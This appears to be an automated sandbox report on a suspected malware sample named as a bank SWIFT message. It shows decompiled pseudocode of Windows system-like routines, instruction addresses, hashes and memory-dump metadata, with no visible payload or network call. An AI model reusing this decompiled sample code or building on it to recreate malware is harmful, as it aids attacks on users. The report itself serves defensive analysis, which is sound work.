                                                                    				return _t30;
                                                                    			}









                                                                    0x018a1b8f
                                                                    0x018a1b9a
                                                                    0x018a1b9c
                                                                    0x018a1b9e
                                                                    0x018a1ba3
                                                                    0x018f7010
                                                                    0x018f7010
                                                                    0x00000000
                                                                    0x018a1ba9
                                                                    0x018a1ba9
                                                                    0x018a1bae
                                                                    0x00000000
                                                                    0x018a1bc5
                                                                    0x018a1bca
                                                                    0x018a1bcf
                                                                    0x018a1bd0
                                                                    0x018a1bd1
                                                                    0x018a1bd2
                                                                    0x018a1bd6
                                                                    0x018a1bdc
                                                                    0x018a1be0
                                                                    0x018f6ffc
                                                                    0x018f7000
                                                                    0x00000000
                                                                    0x018f7006
                                                                    0x018f7009
                                                                    0x018f7009
                                                                    0x018a1be6
                                                                    0x018a1bec
                                                                    0x018a1c0b
                                                                    0x018a1c0b
                                                                    0x018a1c0c
                                                                    0x018a1c11
                                                                    0x018a1c12
                                                                    0x018a1c15
                                                                    0x018a1c1b
                                                                    0x018a1c1f
                                                                    0x018a1c31
                                                                    0x018a1c33
                                                                    0x018f7026
                                                                    0x018f7026
                                                                    0x018a1c21
                                                                    0x018a1c24
                                                                    0x018a1c24
                                                                    0x018a1bee
                                                                    0x018a1bee
                                                                    0x018a1bf2
                                                                    0x018a1c3a
                                                                    0x018a1bf4
                                                                    0x018a1bf4
                                                                    0x018a1c05
                                                                    0x018a1c05
                                                                    0x018a1c09
                                                                    0x018a1c3e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a1c09
                                                                    0x018a1bec
                                                                    0x018a1be0
                                                                    0x018a1bae
                                                                    0x018a1c2e

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction ID: a33598813d55644a9b92a22f86c02ed58675cddc10b6dbbd8a8b1f15d33f6528
                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction Fuzzy Hash: 3121073A500229EBFB229A5DC884F9BBBADEF91B54F154425FE04CB200D630DF00D7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                    				intOrPtr _t13;
                                                                    				intOrPtr _t14;
                                                                    				signed int _t16;
                                                                    				signed char _t17;
                                                                    				intOrPtr _t19;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t23;
                                                                    				intOrPtr* _t25;
                                                                    
                                                                    				_t25 = _a8;
                                                                    				_t17 = __ecx;
                                                                    				if(_t25 == 0) {
                                                                    					_t19 = 0xc00000f2;
                                                                    					L8:
                                                                    					return _t19;
                                                                    				}
                                                                    				if((__ecx & 0xfffffffe) != 0) {
                                                                    					_t19 = 0xc00000ef;
                                                                    					goto L8;
                                                                    				}
                                                                    				_t19 = 0;
                                                                    				 *_t25 = 0;
                                                                    				_t21 = 0;
                                                                    				_t23 = "Actx ";
                                                                    				if(__edx != 0) {
                                                                    					if(__edx == 0xfffffffc) {
                                                                    						L21:
                                                                    						_t21 = 0x200;
                                                                    						L5:
                                                                    						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                    						 *_t25 = _t13;
                                                                    						L6:
                                                                    						if(_t13 == 0) {
                                                                    							if((_t17 & 0x00000001) != 0) {
                                                                    								 *_t25 = _t23;
                                                                    							}
                                                                    						}
                                                                    						L7:
                                                                    						goto L8;
                                                                    					}
                                                                    					if(__edx == 0xfffffffd) {
                                                                    						 *_t25 = _t23;
                                                                    						_t13 = _t23;
                                                                    						goto L6;
                                                                    					}
                                                                    					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                    					 *_t25 = _t13;
                                                                    					L14:
                                                                    					if(_t21 == 0) {
                                                                    						goto L6;
                                                                    					}
                                                                    					goto L5;
                                                                    				}
                                                                    				_t14 = _a4;
                                                                    				if(_t14 != 0) {
                                                                    					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                    					if(_t16 <= 1) {
                                                                    						_t21 = 0x1f8;
                                                                    						_t13 = 0;
                                                                    						goto L14;
                                                                    					}
                                                                    					if(_t16 == 2) {
                                                                    						goto L21;
                                                                    					}
                                                                    					if(_t16 != 4) {
                                                                    						_t19 = 0xc00000f0;
                                                                    						goto L7;
                                                                    					}
                                                                    					_t13 = 0;
                                                                    					goto L6;
                                                                    				} else {
                                                                    					_t21 = 0x1f8;
                                                                    					goto L5;
                                                                    				}
                                                                    			}











                                                                    0x018bf71d
                                                                    0x018bf722
                                                                    0x018bf726
                                                                    0x01904770
                                                                    0x018bf765
                                                                    0x018bf769
                                                                    0x018bf769
                                                                    0x018bf732
                                                                    0x0190477a
                                                                    0x00000000
                                                                    0x0190477a
                                                                    0x018bf738
                                                                    0x018bf73a
                                                                    0x018bf73c
                                                                    0x018bf73f
                                                                    0x018bf746
                                                                    0x018bf778
                                                                    0x018bf7a9
                                                                    0x018bf7a9
                                                                    0x018bf754
                                                                    0x018bf75a
                                                                    0x018bf75d
                                                                    0x018bf75f
                                                                    0x018bf761
                                                                    0x018bf76f
                                                                    0x018bf771
                                                                    0x018bf771
                                                                    0x018bf76f
                                                                    0x018bf763
                                                                    0x00000000
                                                                    0x018bf763
                                                                    0x018bf77d
                                                                    0x018bf7a3
                                                                    0x018bf7a5
                                                                    0x00000000
                                                                    0x018bf7a5
                                                                    0x018bf77f
                                                                    0x018bf782
                                                                    0x018bf784
                                                                    0x018bf786
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018bf788
                                                                    0x018bf748
                                                                    0x018bf74d
                                                                    0x018bf78d
                                                                    0x018bf793
                                                                    0x018bf7b7
                                                                    0x018bf7bc
                                                                    0x00000000
                                                                    0x018bf7bc
                                                                    0x018bf798
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018bf79d
                                                                    0x018bf7b0
                                                                    0x00000000
                                                                    0x018bf7b0
                                                                    0x018bf79f
                                                                    0x00000000
                                                                    0x018bf74f
                                                                    0x018bf74f
                                                                    0x00000000
                                                                    0x018bf74f

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                                                                    • Instruction ID: 607d4d6c51d26aaebcc1e9afe97864a1c212ce75d89abde95c2880d185bfec23
                                                                    • Opcode Fuzzy Hash: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                                                                    • Instruction Fuzzy Hash: 9A11E6343046869BE7254E1D8CD07F677D5EB85328F2445AAEB65CB392D770DA40C348
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E01948DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t35;
                                                                    				void* _t41;
                                                                    
                                                                    				_t40 = __esi;
                                                                    				_t39 = __edi;
                                                                    				_t38 = __edx;
                                                                    				_t35 = __ecx;
                                                                    				_t34 = __ebx;
                                                                    				_push(0x74);
                                                                    				_push(0x1970d50);
                                                                    				E018ED0E8(__ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                    				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                    					E01925720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                    					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                    						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                    						asm("int3");
                                                                    						 *(_t41 - 4) = 0xfffffffe;
                                                                    					}
                                                                    				}
                                                                    				 *(_t41 - 4) = 1;
                                                                    				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                    				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                    				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t41 - 0x64)) = E018EDEF0;
                                                                    				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                    				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                    				_push(_t41 - 0x70);
                                                                    				E018EDEF0(1, _t38);
                                                                    				 *(_t41 - 4) = 0xfffffffe;
                                                                    				return E018ED130(_t34, _t39, _t40);
                                                                    			}





                                                                    0x01948df1
                                                                    0x01948df1
                                                                    0x01948df1
                                                                    0x01948df1
                                                                    0x01948df1
                                                                    0x01948df1
                                                                    0x01948df3
                                                                    0x01948df8
                                                                    0x01948dfd
                                                                    0x01948e00
                                                                    0x01948e0e
                                                                    0x01948e2a
                                                                    0x01948e36
                                                                    0x01948e38
                                                                    0x01948e3c
                                                                    0x01948e46
                                                                    0x01948e46
                                                                    0x01948e36
                                                                    0x01948e50
                                                                    0x01948e56
                                                                    0x01948e59
                                                                    0x01948e5c
                                                                    0x01948e60
                                                                    0x01948e67
                                                                    0x01948e6d
                                                                    0x01948e73
                                                                    0x01948e74
                                                                    0x01948eb1
                                                                    0x01948ebd

                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 01948E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                                                                    • Instruction ID: b42f070ff4e1db67269cff90b9d78584fcba59adaaee2f017ce7af9a913c20b0
                                                                    • Opcode Fuzzy Hash: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                                                                    • Instruction Fuzzy Hash: 71117571D04348EBDF24EFE88509BADBBB4AB05711F24421EE52CAB282C3345606CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 88%
                                                                    			E01965BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t296;
                                                                    				signed char _t298;
                                                                    				signed int _t301;
                                                                    				signed int _t306;
                                                                    				signed int _t310;
                                                                    				signed char _t311;
                                                                    				intOrPtr _t312;
                                                                    				signed int _t313;
                                                                    				void* _t327;
                                                                    				signed int _t328;
                                                                    				intOrPtr _t329;
                                                                    				intOrPtr _t333;
                                                                    				signed char _t334;
                                                                    				signed int _t336;
                                                                    				void* _t339;
                                                                    				signed int _t340;
                                                                    				signed int _t356;
                                                                    				signed int _t362;
                                                                    				short _t367;
                                                                    				short _t368;
                                                                    				short _t373;
                                                                    				signed int _t380;
                                                                    				void* _t382;
                                                                    				short _t385;
                                                                    				signed short _t392;
                                                                    				signed char _t393;
                                                                    				signed int _t395;
                                                                    				signed char _t397;
                                                                    				signed int _t398;
                                                                    				signed short _t402;
                                                                    				void* _t406;
                                                                    				signed int _t412;
                                                                    				signed char _t414;
                                                                    				signed short _t416;
                                                                    				signed int _t421;
                                                                    				signed char _t427;
                                                                    				intOrPtr _t434;
                                                                    				signed char _t435;
                                                                    				signed int _t436;
                                                                    				signed int _t442;
                                                                    				signed int _t446;
                                                                    				signed int _t447;
                                                                    				signed int _t451;
                                                                    				signed int _t453;
                                                                    				signed int _t454;
                                                                    				signed int _t455;
                                                                    				intOrPtr _t456;
                                                                    				intOrPtr* _t457;
                                                                    				short _t458;
                                                                    				signed short _t462;
                                                                    				signed int _t469;
                                                                    				intOrPtr* _t474;
                                                                    				signed int _t475;
                                                                    				signed int _t479;
                                                                    				signed int _t480;
                                                                    				signed int _t481;
                                                                    				short _t485;
                                                                    				signed int _t491;
                                                                    				signed int* _t494;
                                                                    				signed int _t498;
                                                                    				signed int _t505;
                                                                    				intOrPtr _t506;
                                                                    				signed short _t508;
                                                                    				signed int _t511;
                                                                    				void* _t517;
                                                                    				signed int _t519;
                                                                    				signed int _t522;
                                                                    				void* _t523;
                                                                    				signed int _t524;
                                                                    				void* _t528;
                                                                    				signed int _t529;
                                                                    
                                                                    				_push(0xd4);
                                                                    				_push(0x1971178);
                                                                    				E018ED0E8(__ebx, __edi, __esi);
                                                                    				_t494 = __edx;
                                                                    				 *(_t528 - 0xcc) = __edx;
                                                                    				_t511 = __ecx;
                                                                    				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                    				 *(_t528 - 0xbc) = __ecx;
                                                                    				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                    				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                    				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                    				_t427 = 0;
                                                                    				 *(_t528 - 0x74) = 0;
                                                                    				 *(_t528 - 0x9c) = 0;
                                                                    				 *(_t528 - 0x84) = 0;
                                                                    				 *(_t528 - 0xac) = 0;
                                                                    				 *(_t528 - 0x88) = 0;
                                                                    				 *(_t528 - 0xa8) = 0;
                                                                    				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                    				if( *(_t528 + 0x1c) <= 0x80) {
                                                                    					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                    					if(__eflags != 0) {
                                                                    						_t421 = E01964C56(0, __edx, __ecx, __eflags);
                                                                    						__eflags = _t421;
                                                                    						if(_t421 != 0) {
                                                                    							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                    							E018DD000(0x410);
                                                                    							 *(_t528 - 0x18) = _t529;
                                                                    							 *(_t528 - 0x9c) = _t529;
                                                                    							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                    							E01965542(_t528 - 0x9c, _t528 - 0x84);
                                                                    						}
                                                                    					}
                                                                    					_t435 = _t427;
                                                                    					 *(_t528 - 0xd0) = _t435;
                                                                    					_t474 = _t511 + 0x65;
                                                                    					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                    					_t511 = 0x18;
                                                                    					while(1) {
                                                                    						 *(_t528 - 0xa0) = _t427;
                                                                    						 *(_t528 - 0xbc) = _t427;
                                                                    						 *(_t528 - 0x80) = _t427;
                                                                    						 *(_t528 - 0x78) = 0x50;
                                                                    						 *(_t528 - 0x79) = _t427;
                                                                    						 *(_t528 - 0x7a) = _t427;
                                                                    						 *(_t528 - 0x8c) = _t427;
                                                                    						 *(_t528 - 0x98) = _t427;
                                                                    						 *(_t528 - 0x90) = _t427;
                                                                    						 *(_t528 - 0xb0) = _t427;
                                                                    						 *(_t528 - 0xb8) = _t427;
                                                                    						_t296 = 1 << _t435;
                                                                    						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                    						__eflags = _t436 & _t296;
                                                                    						if((_t436 & _t296) != 0) {
                                                                    							goto L92;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t474 - 1));
                                                                    						if( *((char*)(_t474 - 1)) == 0) {
                                                                    							goto L92;
                                                                    						}
                                                                    						_t301 =  *_t474;
                                                                    						__eflags = _t494[1] - _t301;
                                                                    						if(_t494[1] <= _t301) {
                                                                    							L10:
                                                                    							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                    							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                    								L12:
                                                                    								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                    								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                    									goto L92;
                                                                    								}
                                                                    								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                    								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                    								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                    									goto L92;
                                                                    								}
                                                                    								__eflags = _t442 -  *(_t474 - 0x11);
                                                                    								if(_t442 !=  *(_t474 - 0x11)) {
                                                                    									goto L92;
                                                                    								}
                                                                    								L15:
                                                                    								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                    								 *(_t528 - 0xc0) = _t306;
                                                                    								 *(_t528 - 0xa4) = _t306;
                                                                    								__eflags =  *0x19860e8;
                                                                    								if( *0x19860e8 != 0) {
                                                                    									__eflags = _t306 - 0x40;
                                                                    									if(_t306 < 0x40) {
                                                                    										L20:
                                                                    										asm("lock inc dword [eax]");
                                                                    										_t310 =  *0x19860e8; // 0x0
                                                                    										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                    										__eflags = _t311 & 0x00000001;
                                                                    										if((_t311 & 0x00000001) == 0) {
                                                                    											 *(_t528 - 0xa0) = _t311;
                                                                    											_t475 = _t427;
                                                                    											 *(_t528 - 0x74) = _t427;
                                                                    											__eflags = _t475;
                                                                    											if(_t475 != 0) {
                                                                    												L91:
                                                                    												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                    												goto L92;
                                                                    											}
                                                                    											asm("sbb edi, edi");
                                                                    											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                    											_t511 = _t498;
                                                                    											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                    											__eflags =  *(_t312 - 5) & 1;
                                                                    											if(( *(_t312 - 5) & 1) != 0) {
                                                                    												_push(_t528 - 0x98);
                                                                    												_push(0x4c);
                                                                    												_push(_t528 - 0x70);
                                                                    												_push(1);
                                                                    												_push(0xfffffffa);
                                                                    												_t412 = E018D9710();
                                                                    												_t475 = _t427;
                                                                    												__eflags = _t412;
                                                                    												if(_t412 >= 0) {
                                                                    													_t414 =  *(_t528 - 0x98) - 8;
                                                                    													 *(_t528 - 0x98) = _t414;
                                                                    													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                    													 *(_t528 - 0x8c) = _t416;
                                                                    													 *(_t528 - 0x79) = 1;
                                                                    													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                    													__eflags = _t511;
                                                                    												}
                                                                    											}
                                                                    											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                    											__eflags = _t446 & 0x00000004;
                                                                    											if((_t446 & 0x00000004) != 0) {
                                                                    												__eflags =  *(_t528 - 0x9c);
                                                                    												if( *(_t528 - 0x9c) != 0) {
                                                                    													 *(_t528 - 0x7a) = 1;
                                                                    													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                    													__eflags = _t511;
                                                                    												}
                                                                    											}
                                                                    											_t313 = 2;
                                                                    											_t447 = _t446 & _t313;
                                                                    											__eflags = _t447;
                                                                    											 *(_t528 - 0xd4) = _t447;
                                                                    											if(_t447 != 0) {
                                                                    												_t406 = 0x10;
                                                                    												_t511 = _t511 + _t406;
                                                                    												__eflags = _t511;
                                                                    											}
                                                                    											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                    											 *(_t528 - 0x88) = _t427;
                                                                    											__eflags =  *(_t528 + 0x1c);
                                                                    											if( *(_t528 + 0x1c) <= 0) {
                                                                    												L45:
                                                                    												__eflags =  *(_t528 - 0xb0);
                                                                    												if( *(_t528 - 0xb0) != 0) {
                                                                    													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                    													__eflags = _t511;
                                                                    												}
                                                                    												__eflags = _t475;
                                                                    												if(_t475 != 0) {
                                                                    													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                    													goto L100;
                                                                    												} else {
                                                                    													_t494[3] = _t511;
                                                                    													_t451 =  *(_t528 - 0xa0);
                                                                    													_t427 = E018D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                    													 *(_t528 - 0x88) = _t427;
                                                                    													__eflags = _t427;
                                                                    													if(_t427 == 0) {
                                                                    														__eflags = _t511 - 0xfff8;
                                                                    														if(_t511 <= 0xfff8) {
                                                                    															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                    															asm("sbb ecx, ecx");
                                                                    															__eflags = (_t451 & 0x000000e2) + 8;
                                                                    														}
                                                                    														asm("lock dec dword [eax+edx*8+0x4]");
                                                                    														L100:
                                                                    														goto L101;
                                                                    													}
                                                                    													_t453 =  *(_t528 - 0xa0);
                                                                    													 *_t494 = _t453;
                                                                    													_t494[1] = _t427;
                                                                    													_t494[2] =  *(_t528 - 0xbc);
                                                                    													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                    													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                    													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                    													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													__eflags =  *(_t528 + 0x14);
                                                                    													if( *(_t528 + 0x14) == 0) {
                                                                    														__eflags =  *[fs:0x18] + 0xf50;
                                                                    													}
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													__eflags =  *(_t528 + 0x18);
                                                                    													if( *(_t528 + 0x18) == 0) {
                                                                    														_t454 =  *(_t528 - 0x80);
                                                                    														_t479 =  *(_t528 - 0x78);
                                                                    														_t327 = 1;
                                                                    														__eflags = 1;
                                                                    													} else {
                                                                    														_t146 = _t427 + 0x50; // 0x50
                                                                    														_t454 = _t146;
                                                                    														 *(_t528 - 0x80) = _t454;
                                                                    														_t382 = 0x18;
                                                                    														 *_t454 = _t382;
                                                                    														 *((short*)(_t454 + 2)) = 1;
                                                                    														_t385 = 0x10;
                                                                    														 *((short*)(_t454 + 6)) = _t385;
                                                                    														 *(_t454 + 4) = 0;
                                                                    														asm("movsd");
                                                                    														asm("movsd");
                                                                    														asm("movsd");
                                                                    														asm("movsd");
                                                                    														_t327 = 1;
                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                    														_t479 = 0x68;
                                                                    														 *(_t528 - 0x78) = _t479;
                                                                    													}
                                                                    													__eflags =  *(_t528 - 0x79) - _t327;
                                                                    													if( *(_t528 - 0x79) == _t327) {
                                                                    														_t524 = _t479 + _t427;
                                                                    														_t508 =  *(_t528 - 0x8c);
                                                                    														 *_t524 = _t508;
                                                                    														_t373 = 2;
                                                                    														 *((short*)(_t524 + 2)) = _t373;
                                                                    														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                    														 *((short*)(_t524 + 4)) = 0;
                                                                    														_t167 = _t524 + 8; // 0x8
                                                                    														E018DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                    														_t529 = _t529 + 0xc;
                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                    														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                    														 *(_t528 - 0x78) = _t479;
                                                                    														_t380 =  *(_t528 - 0x80);
                                                                    														__eflags = _t380;
                                                                    														if(_t380 != 0) {
                                                                    															_t173 = _t380 + 4;
                                                                    															 *_t173 =  *(_t380 + 4) | 1;
                                                                    															__eflags =  *_t173;
                                                                    														}
                                                                    														_t454 = _t524;
                                                                    														 *(_t528 - 0x80) = _t454;
                                                                    														_t327 = 1;
                                                                    														__eflags = 1;
                                                                    													}
                                                                    													__eflags =  *(_t528 - 0xd4);
                                                                    													if( *(_t528 - 0xd4) == 0) {
                                                                    														_t505 =  *(_t528 - 0x80);
                                                                    													} else {
                                                                    														_t505 = _t479 + _t427;
                                                                    														_t523 = 0x10;
                                                                    														 *_t505 = _t523;
                                                                    														_t367 = 3;
                                                                    														 *((short*)(_t505 + 2)) = _t367;
                                                                    														_t368 = 4;
                                                                    														 *((short*)(_t505 + 6)) = _t368;
                                                                    														 *(_t505 + 4) = 0;
                                                                    														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                    														_t327 = 1;
                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                    														_t479 = _t479 + _t523;
                                                                    														 *(_t528 - 0x78) = _t479;
                                                                    														__eflags = _t454;
                                                                    														if(_t454 != 0) {
                                                                    															_t186 = _t454 + 4;
                                                                    															 *_t186 =  *(_t454 + 4) | 1;
                                                                    															__eflags =  *_t186;
                                                                    														}
                                                                    														 *(_t528 - 0x80) = _t505;
                                                                    													}
                                                                    													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                    													if( *(_t528 - 0x7a) == _t327) {
                                                                    														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                    														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                    														E018DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                    														_t529 = _t529 + 0xc;
                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                    														_t479 =  *(_t528 - 0x78) + _t522;
                                                                    														 *(_t528 - 0x78) = _t479;
                                                                    														__eflags = _t505;
                                                                    														if(_t505 != 0) {
                                                                    															_t199 = _t505 + 4;
                                                                    															 *_t199 =  *(_t505 + 4) | 1;
                                                                    															__eflags =  *_t199;
                                                                    														}
                                                                    														_t505 =  *(_t528 - 0xd4);
                                                                    														 *(_t528 - 0x80) = _t505;
                                                                    													}
                                                                    													__eflags =  *(_t528 - 0xa8);
                                                                    													if( *(_t528 - 0xa8) != 0) {
                                                                    														_t356 = _t479 + _t427;
                                                                    														 *(_t528 - 0xd4) = _t356;
                                                                    														_t462 =  *(_t528 - 0xac);
                                                                    														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                    														_t485 = 0xc;
                                                                    														 *((short*)(_t356 + 2)) = _t485;
                                                                    														 *(_t356 + 6) = _t462;
                                                                    														 *((short*)(_t356 + 4)) = 0;
                                                                    														_t211 = _t356 + 8; // 0x9
                                                                    														E018DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                    														E018DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                    														_t529 = _t529 + 0x18;
                                                                    														_t427 =  *(_t528 - 0x88);
                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                    														_t505 =  *(_t528 - 0xd4);
                                                                    														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                    														 *(_t528 - 0x78) = _t479;
                                                                    														_t362 =  *(_t528 - 0x80);
                                                                    														__eflags = _t362;
                                                                    														if(_t362 != 0) {
                                                                    															_t222 = _t362 + 4;
                                                                    															 *_t222 =  *(_t362 + 4) | 1;
                                                                    															__eflags =  *_t222;
                                                                    														}
                                                                    													}
                                                                    													__eflags =  *(_t528 - 0xb0);
                                                                    													if( *(_t528 - 0xb0) != 0) {
                                                                    														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                    														_t458 = 0xb;
                                                                    														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                    														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                    														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                    														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
